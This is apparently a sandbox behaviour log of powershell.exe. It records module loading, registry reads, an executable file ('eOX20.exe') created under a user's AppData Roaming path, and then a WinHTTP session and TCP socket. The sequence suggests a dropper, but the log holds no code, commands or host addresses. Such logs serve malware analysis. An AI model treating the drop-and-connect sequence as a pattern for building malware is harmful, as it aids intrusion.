| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59d5724e-f87a-4ca0-8538-a1aa0afd1b15, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59d5724e-f87a-4ca0-8538-a1aa0afd1b15, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59d5724e-f87a-4ca0-8538-a1aa0afd1b15, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59d5724e-f87a-4ca0-8538-a1aa0afd1b15, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59d5724e-f87a-4ca0-8538-a1aa0afd1b15, size = 14, size_out = 14 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_59d5724e-f87a-4ca0-8538-a1aa0afd1b15, size = 4096, size_out = 509 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b38f6763-c723-40d8-b8de-c06c46071305, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b38f6763-c723-40d8-b8de-c06c46071305, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b38f6763-c723-40d8-b8de-c06c46071305, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b38f6763-c723-40d8-b8de-c06c46071305, size = 4096, size_out = 2852 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49e7e553-4311-4abe-b1f1-75195838f0f3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49e7e553-4311-4abe-b1f1-75195838f0f3, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49e7e553-4311-4abe-b1f1-75195838f0f3, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49e7e553-4311-4abe-b1f1-75195838f0f3, size = 4096, size_out = 3369 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66f2ad77-2ad3-4044-a136-48e7ec5af0c1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66f2ad77-2ad3-4044-a136-48e7ec5af0c1, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66f2ad77-2ad3-4044-a136-48e7ec5af0c1, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_66f2ad77-2ad3-4044-a136-48e7ec5af0c1, size = 4096, size_out = 3180 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_188860f4-0679-4fd0-b484-187a5f17529b, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_188860f4-0679-4fd0-b484-187a5f17529b, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_188860f4-0679-4fd0-b484-187a5f17529b, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_188860f4-0679-4fd0-b484-187a5f17529b, size = 4096, size_out = 2683 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_27a6b737-e0ba-4068-91dd-df8565735034, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_27a6b737-e0ba-4068-91dd-df8565735034, type = size, size_out = 0 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dbee20bc-62c7-4e43-88cf-26896b7d00e5, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dbee20bc-62c7-4e43-88cf-26896b7d00e5, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dbee20bc-62c7-4e43-88cf-26896b7d00e5, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dbee20bc-62c7-4e43-88cf-26896b7d00e5, size = 4096, size_out = 4072 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 2, size_out = 2 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 2, size_out = 2 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 3, size_out = 3 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 3, size_out = 3 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_037cac7f-3205-4f41-87ab-36285b680510, size = 4096, size_out = 1573 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
3 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 2085 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 987, size_out = 0 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellSnapIns |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_type |
|
2 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 112 |
|
1 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 4096 |
|
8 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 3215 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\RoamingeOX20.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework, value_name = LegacyWPADSupport, type = REG_NONE |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
